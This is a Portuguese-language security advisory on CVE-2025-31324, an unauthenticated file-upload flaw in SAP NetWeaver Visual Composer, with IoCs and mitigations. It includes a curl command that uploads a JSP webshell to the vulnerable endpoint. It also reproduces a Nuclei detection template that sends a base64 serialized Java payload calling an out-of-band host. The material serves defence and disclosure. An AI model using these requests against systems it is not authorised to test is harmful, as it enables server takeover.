Introdução

A CVE-2025-31324, publicada em 24 de abril de 2025 no NVD, é uma falha crítica no componente Metadata Uploader do SAP NetWeaver Visual Composer. Identificada inicialmente pela ReliaQuest em 22 de abril de 2025, conforme relatado em seu blog, ela permite que atacantes não autenticados realizem upload de arquivos maliciosos, resultando em execução remota de código (RCE).

Com uma pontuação CVSS 3.1 de 10.0, a vulnerabilidade tem impacto severo, podendo comprometer completamente a confidencialidade, integridade e disponibilidade dos sistemas afetados. Evidências de exploração ativa desde 20 de janeiro de 2025, conforme documentado pela Onapsis, caracterizam-na como uma vulnerabilidade zero-day. A CISA incluiu a falha em seu Catálogo de Vulnerabilidades Exploradas em 29 de abril de 2025, reforçando a urgência de mitigação.

Versões Afetadas

A vulnerabilidade afeta o componente SAP Visual Composer (VCFRAMEWORK) em todas as versões do SAP NetWeaver 7.xx (todos os Support Packs - SPS), que opera na pilha Java do NetWeaver.

Especificamente, o componente vulnerável é o Metadata Uploader, presente no endpoint /developmentserver/metadatauploader. Embora o Visual Composer não seja instalado por padrão, ele está amplamente habilitado, estimando-se que 50% a 70% dos sistemas NetWeaver Java sejam potencialmente vulneráveis, conforme relatado pela Hackread.

Tabela de Versões Afetadas

Produto	Versão	Componente Afetado	Notas
SAP NetWeaver	7.xx (todos os SPS)	Visual Composer (Metadata Uploader)	Requer componente VCFRAMEWORK instalado

Detalhamento Técnico

A falha reside no componente Metadata Uploader, que não valida a identidade ou permissões do usuário ao processar requisições de upload no endpoint /developmentserver/metadatauploader. Isso permite que atacantes não autenticados enviem arquivos executáveis, como webshells JSP, para diretórios acessíveis publicamente, resultando em RCE.

Processo de Exploração

O ataque ocorre via requisições HTTP/POST para o endpoint /developmentserver/metadatauploader. Um atacante pode enviar um arquivo malicioso, como uma webshell JSP, que é armazenado em diretórios como /usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root.

Um exemplo hipotético de exploração usando curl seria:

curl -X POST -F "file=@webshell.jsp" http://<alvo>/developmentserver/metadatauploader/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1

Após o upload, a webshell pode ser acessada via uma requisição GET em http://<alvo>/irj/webshell.jsp, permitindo a execução de comandos arbitrários no servidor.

ℹ

Este exemplo é apenas para fins educacionais e não deve ser usado para atividades maliciosas.

Exploits Públicos

Embora exploits completos não estejam amplamente disponíveis, a facilidade de detecção e exploração da vulnerabilidade gera um alerta para as organizações.

A Onapsis disponibilizou um scanner open-source no GitHub para verificar a presença do componente vulnerável, status do patch e webshells conhecidas. A RedRays também publicou um scanner que detecta a vulnerabilidade e arquivos maliciosos.

Além disso, um template do Nuclei para a CVE já está disponível, possibilitando uma detecção massiva de aplicações atualmente vulneráveis.

id: CVE-2025-31324

info:
  name: SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
  reference:
    - https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
    - https://www.theregister.com/2025/04/25/sap_netweaver_patch/
    - https://me.sap.com/notes/3594142
    - https://url.sap/sapsecuritypatchday
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-31324
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.12532
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SAP NetWeaver Application Server Java"
  tags: cve,cve2025,sap,netweaver,rce,deserialization

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',54,'prefix')}}"


http:
  - raw:
      - |
        POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data

        {{zip('.properties',replace(base64_decode('rO0ABXNyABRqYXZhLnV0aWwuUHJvcGVydGllczkS0HpwNj6YAgABTAAIZGVmYXVsdHN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHIAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAADdwgAAAAFAAAAAnQADnByb2plY3QtbmF0dXJlc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAFzcgAMamF2YS5uZXQuVVJMliU3Nhr85HIDAAdJAAhoYXNoQ29kZUkABHBvcnRMAAlhdXRob3JpdHl0ABJMamF2YS9sYW5nL1N0cmluZztMAARmaWxlcQB+AAhMAARob3N0cQB+AAhMAAhwcm90b2NvbHEAfgAITAADcmVmcQB+AAh4cP//////////dAA2YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhdAAAcQB+AAp0AARodHRwcHh0AD1odHRwOi8vYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheHQAC0VYUE9SVC1OQU1FdAATc29tZV9wcm9qZWN0X25hbWV4eHhw'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',payload))}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'FAILED', 'Cause')
        condition: and
# digest: 4a0a00473045022100f5b505da6330ce6f914842169ea999457eb6ccd6702d7f10011b8b67aabd107b02203d3504d0f406612d5ccbdde93d7c452e029e4393550688a47e9410d9ce68425a:922c64590222798bb761d5b6d8e72950

Indicadores de Comprometimento (IoCs)

A Onapsis identificou os seguintes IoCs para detectar sistemas comprometidos:

Arquivos suspeitos: Arquivos .jsp, .java ou .class em /usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root, /work ou /work/sync.
Hashes conhecidos:
- helper.jsp: SHA-256 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087
- cache.jsp: SHA-256 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf
- Arquivos com nomes aleatórios de 8 caracteres (e.g., [a-z]{8}.jsp): SHA-256 b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee

Requisitos de exploração

Endpoint: Acesso ao endpoint /developmentserver/metadatauploader via HTTP/HTTPS, sem necessidade de autenticação.
Táticas MITRE ATT&CK: T1190 (Exploit Public-Facing Application), T1505.003 (Server Software Component: Web Shell).

Mitigações

Patch Oficial

A SAP lançou um patch de emergência na SAP Security Note 3594142, disponível para clientes no portal de suporte. A aplicação imediata do patch é a solução recomendada para eliminar a vulnerabilidade.

Medidas Temporárias

Enquanto o patch não é aplicado, as seguintes ações podem reduzir o risco:

Restringir Acesso: Configure regras de firewall ou utilize recursos de segurança do SAP para bloquear requisições ao endpoint /developmentserver/metadatauploader.
Desativar Visual Composer: Se o componente não for essencial, desative-o para eliminar a superfície de ataque.
Monitoramento e Detecção: Encaminhe logs para um sistema SIEM e escaneie diretórios como /usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root para arquivos não autorizados, verificando os hashes mencionados.

Conclusão

A CVE-2025-31324 representa uma ameaça crítica devido à sua capacidade de permitir controle total sobre sistemas SAP NetWeaver sem autenticação, com exploração ativa confirmada desde janeiro de 2025. Sua inclusão no Catálogo de Vulnerabilidades Exploradas da CISA e a pontuação CVSS 10.0 destacam a necessidade de ação imediata. Organizações devem priorizar a aplicação do patch da SAP Security Note 3594142, implementar medidas temporárias e monitorar sistemas para sinais de comprometimento.

Se você deseja testar a segurança de seus sistemas de forma prática e eficaz, te convidamos a realizar um torneio hacking na Bypassec, uma plataforma gamificada com mais de 100 hackers éticos em prontidão para identificar as vulnerabilidades em seu ambiente.

CVE-2025-31324: Execução Remota de Código no SAP NetWeaver Visual Composer

Table of contents